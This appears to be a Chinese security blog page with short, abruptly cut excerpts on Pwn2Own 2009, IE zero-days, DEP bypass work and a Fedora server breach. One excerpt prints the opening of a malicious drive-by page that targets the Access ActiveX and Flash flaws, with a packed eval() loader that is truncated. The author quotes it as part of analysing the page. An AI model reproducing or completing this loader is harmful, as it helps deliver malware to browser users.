http://blogs.zdnet.com/security/?p=2951

神人啊，http://blogs.zdnet.com/security/?p=2934

update:
来瞻仰一下，http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits

CanSecWest 的pwn2own 2009 即将要开始了，期待新的0day.

看到Twitter上几个大牛再说JM的heap paper，期待公布后一阅。

Trendmicro 抓到了针对MS09-002 (ZDI-09-011)的攻击样本了，其实这个漏洞比之前那个data binding的更牛一点，虽然同样也只影响IE 7。但是关注的朋友不多啊，甚至SWI blog都没8一下？ 真是奇怪啊！

XP SP3 dep要比XP SP2好解决，XP SP2本来打算放弃，谁知柳暗花明居然被我找到了一跳指令，果真应了船到桥头自然直啊。

顺便8卦一下Alexander Sotirov 居然就是Solar Eclipse，他以前写过不少linux exploit啊，比如以前在地下流传很久的openssl-too-open.c openldap-kbind-p00f.c等等，没记错的话他以前还是0dd的。牛人就是牛人啊，除了linux/windows，这厮还擅长XSS，看他在recon上讲的Blackbox Reversing Of XSS Filters就知道了，不过想到他的heap fengshui代码，还是可以看的出来他js的功底还是颇深的。

搞定了\，还有DEP啊，比较困难啊。

若干Fedora的核心服务器被人日了，还不清楚是用啥0day进去的，rsync openssh 也有可能是DNS 中毒?

http://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html
http://rhn.redhat.com/errata/RHSA-2008-0855.html

看到pete大师在irc里面说的，尝试用ie打开了一下，VSE狂报警。
初步看是针对Access activeX下载执行和Flash 这两个漏洞的挂马。
ofc.htm:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=

Pwnie Awards 安全界的"奥斯卡颁奖"，关于去年的获奖情况可以参考Pwnie Awards 2007。今年的颁奖也在即，在下斗